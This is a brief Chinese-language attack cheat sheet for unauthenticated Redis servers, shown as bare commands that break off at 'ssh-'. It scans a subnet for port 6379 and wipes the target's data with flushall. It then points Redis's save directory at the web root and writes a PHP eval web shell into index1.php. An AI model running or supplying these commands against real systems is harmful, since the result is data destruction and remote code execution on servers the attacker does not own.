
nmap --script=redis-info -p6379 192.168.1.0/24 --open
redis写webshell
刷新并进入redis控制台
redis-cli -h 192.168.20.215 flushall
exit
redis-cli -h 192.168.20.215
修改默认目录和文件名(需要web的绝对路径)
config set dir /var/www/html
config set dbfilename index1.php
set a2 "<?php @eval($_POST[cmd]);?>"
save
ssh-...